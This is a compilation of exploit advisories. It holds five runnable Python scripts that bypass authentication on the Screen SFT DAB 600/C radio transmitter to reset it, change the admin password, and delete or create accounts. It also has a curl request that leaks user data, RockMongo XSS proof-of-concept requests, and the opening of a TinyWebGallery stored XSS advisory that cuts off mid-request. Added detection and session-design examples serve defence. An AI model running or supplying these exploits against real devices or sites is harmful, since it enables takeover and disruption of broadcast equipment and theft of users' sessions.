<pre><code>Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)


Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
                  https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
                  Bios firmware: 7.1 (Apr 19 2021)
                  Gui: 2.46
                  FPGA: 169.55
                  uc: 6.15

Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuration flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.

Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request, to gain
access to sensitive information including usernames and source IP
addresses.

Tested on: Keil-EWEB/2.1
           MontaVista® Linux® Carrier Grade eXpress (CGX)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php


19.03.2023

--


$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
</code></pre>
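The endpoint above answers HTTP 200 to everyone, so a status-code rule in a proxy or SIEM will not catch the disclosure; what a defender can do is correlate hits on the management API with whether the source ever authenticated. The following detection is an added example, not part of the ZSL advisory: it parses combined-format access log lines (constructed here) and flags any request to a sensitive `.cgx` endpoint from an IP that has no earlier successful login in the same log window. The login path `/system/api/login.cgx` is a placeholder, since the advisory does not name the device's login endpoint.

```python
"""Flag management-API hits with no preceding login from the same source.
Example code added to this page; not the vendor's or the advisory author's."""
import re

# Endpoints named in the advisories on this page.
SENSITIVE = {"/system/api/userManager.cgx", "/system/api/deviceManagement.cgx"}
# Assumed placeholder: the real login endpoint is not given in the advisory.
LOGIN_PATH = "/system/api/login.cgx"

# Apache/NGINX "combined" log format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict with ip, ts, method, path (query string dropped) and
    integer status, or None for a line that is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]
    rec["status"] = int(rec["status"])
    return rec


def find_unauthenticated_api_access(lines):
    """Return (ip, path) pairs for requests to SENSITIVE paths whose source IP
    had no successful login earlier in the log window."""
    logged_in = set()
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == LOGIN_PATH and rec["status"] == 200:
            logged_in.add(rec["ip"])
        elif rec["path"] in SENSITIVE and rec["ip"] not in logged_in:
            findings.append((rec["ip"], rec["path"]))
    return findings


# Constructed sample log: addresses, timestamps and user agents are made up.
SAMPLE_LOG = [
    '192.168.178.150 - - [19/Mar/2023:10:01:02 +0100] "POST /system/api/login.cgx HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '192.168.178.150 - - [19/Mar/2023:10:01:05 +0100] "GET /system/api/userManager.cgx HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.178.77 - - [19/Mar/2023:10:02:10 +0100] "GET /system/api/userManager.cgx HTTP/1.1" 200 312 "-" "curl/7.88.1"',
    '192.168.178.77 - - [19/Mar/2023:10:02:11 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.88.1"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, path in find_unauthenticated_api_access(SAMPLE_LOG):
        print(f"ALERT: {path} fetched by {ip} with no prior login")
```

The heuristic is deliberately simple: it trusts the log window to contain the login, so run it over a window at least as long as the device's idle timeout (the response above reports `"tmo":120` for the connected user) and treat a hit from a never-logged-in source as something to investigate rather than as proof of compromise.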
<pre><code>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Reset Board Config Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT +
      '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
      '''
      + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT +
      '''
      ZSL and the Producers insist that no one
      submit any exploits of themselves or others
      performing any dangerous activities.
      We will not open or view them.
      '''
      + Style.RESET_ALL)
s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
e = '/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber--',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'deviceManagement',
     'ssbtObj': {
         'reset': 'true'
     }
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
exit(-1)
</code></pre>
<pre><code>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Admin Password Change Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control requiring the admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT +
      '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
      '''
      + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT +
      '''
      ZSL and the Producers insist that no one
      submit any exploits of themselves or others
      performing any dangerous activities.
      We will not open or view them.
      '''
      + Style.RESET_ALL)
s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber-+',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'changeUserPswd': {
             'username': 'admin',
             'password': h
         }
     },
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
exit(-2)
</code></pre>
<pre><code>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT +
      '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
      '''
      + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT +
      '''
      ZSL and the Producers insist that no one
      submit any exploits of themselves or others
      performing any dangerous activities.
      We will not open or view them.
      '''
      + Style.RESET_ALL)
s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
e = '/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber-',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'removeUser': u
     }
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
exit(-3)
</code></pre>
<pre><code>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Password Change Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT +
      '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
      '''
      + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT +
      '''
      ZSL and the Producers insist that no one
      submit any exploits of themselves or others
      performing any dangerous activities.
      We will not open or view them.
      '''
      + Style.RESET_ALL)
s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber+',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'changeUserPswd': {
             'username': u,
             'password': h
         }
     },
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
exit(-4)
</code></pre>
<pre><code>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5771
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()
print(Fore.RED + Style.BRIGHT +
      '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
      '''
      + Style.RESET_ALL)
print(Fore.WHITE + Style.BRIGHT +
      '''
      ZSL and the Producers insist that no one
      submit any exploits of themselves or others
      performing any dangerous activities.
      We will not open or view them.
      '''
      + Style.RESET_ALL)
s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)
t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')
t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber++',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'newUser': {
             'password': h,
             'type': 'OPERATOR',
             'username': u
         }
     },
     }
r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
exit(-5)
</code></pre>
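All five ZSL scripts above rest on one root cause: the device treats a client's IP address as the session identifier, so any host that shares that address (a NAT gateway, the same workstation) inherits the admin's authority with no token at all. The contrast below is an added example, not the vendor's code or the advisory author's. It models the IP-keyed lookup the advisories describe next to a token-based store in which the session is an unguessable bearer token, stored hashed, with an idle timeout (the page's response shows `"tmo":120`) and optional IP pinning as a secondary check only. The class names, the `demo` helpers and the sample addresses are constructed for illustration.

```python
"""IP-bound sessions (the weakness described in the ZSL advisories) beside a
token-based design. Added example; not code from the device or the advisory."""
import hashlib
import secrets
import time


class IpBoundSessions:
    """Weak: whoever sends from an IP with a live session *is* that user."""

    def __init__(self):
        self._by_ip = {}

    def login(self, ip, user):
        self._by_ip[ip] = user

    def user_for(self, ip, token=None):
        # The token is ignored; the source address alone grants authority.
        return self._by_ip.get(ip)


class TokenSessions:
    """Authority comes from a random bearer token. The IP is recorded and may be
    pinned, but it is never sufficient on its own, and idle sessions expire."""

    def __init__(self, idle_timeout=120, pin_ip=True):
        self._by_key = {}          # sha256(token) -> session record
        self.idle_timeout = idle_timeout
        self.pin_ip = pin_ip

    @staticmethod
    def _key(token):
        # Store only a hash so a leaked session table does not leak live tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def login(self, ip, user, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)   # 256 bits of CSPRNG output
        self._by_key[self._key(token)] = {"user": user, "ip": ip, "last": now}
        return token                        # goes to the client, e.g. as an HttpOnly cookie

    def user_for(self, ip, token, now=None):
        now = time.time() if now is None else now
        if not token:
            return None
        key = self._key(token)
        sess = self._by_key.get(key)
        if sess is None:
            return None
        if now - sess["last"] > self.idle_timeout:
            del self._by_key[key]           # expired: drop it
            return None
        if self.pin_ip and sess["ip"] != ip:
            return None                     # token replayed from elsewhere
        sess["last"] = now                  # sliding idle window
        return sess["user"]


def demo_shared_address():
    """Two clients behind one NAT address (constructed). The admin logged in;
    a second client from the same address sends a request with no token.
    Returns what each store believes about that second request."""
    ip = "192.168.178.150"
    weak = IpBoundSessions()
    weak.login(ip, "admin")
    strong = TokenSessions()
    strong.login(ip, "admin", now=1000.0)
    return weak.user_for(ip), strong.user_for(ip, token=None, now=1001.0)


def demo_token_lifecycle():
    """Legitimate use, a replay from another address, and idle expiry."""
    strong = TokenSessions(idle_timeout=120)
    tok = strong.login("10.0.0.5", "dude", now=0.0)
    ok = strong.user_for("10.0.0.5", tok, now=60.0)
    wrong_ip = strong.user_for("10.0.0.6", tok, now=61.0)
    expired = strong.user_for("10.0.0.5", tok, now=60.0 + 121)
    return ok, wrong_ip, expired


if __name__ == "__main__":
    print("shared address:", demo_shared_address())   # ('admin', None)
    print("lifecycle:", demo_token_lifecycle())        # ('dude', None, None)
```

Pinning the IP is kept as an option rather than a requirement because mobile and load-balanced clients legitimately change addresses; the property that actually closes the hole is that nothing short of the secret token is accepted. A separate point the scripts make visible is that the API receives an unsalted MD5 of the password, so the server-side store should re-hash that value with a proper password hash rather than keep it as received.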
<pre><code># Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-19
# Vendor Homepage: https://github.com/iwind/rockmongo/
# Software Link : https://github.com/iwind/rockmongo/
# Tested Version: 1.1.7
# Tested on: Windows 7 and 10

# Vulnerability Type: Stored Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: RockMongo v1.1.7 does not sufficiently encode
user-controlled input, resulting in stored and reflected Cross-Site
Scripting (XSS) via index.php in multiple parameters.

Proof of concept:

Stored:

POST https://localhost/mongo/index.php?action=db.newCollection&db=local HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0

Reflected:

https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log

https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E

https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll

http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll


POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=login.index&host=0
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3

POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.command&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json

POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.execute&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost

code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
</code></pre>
<pre><code>#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored XSS
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
Steps:

1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>



Request:



POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
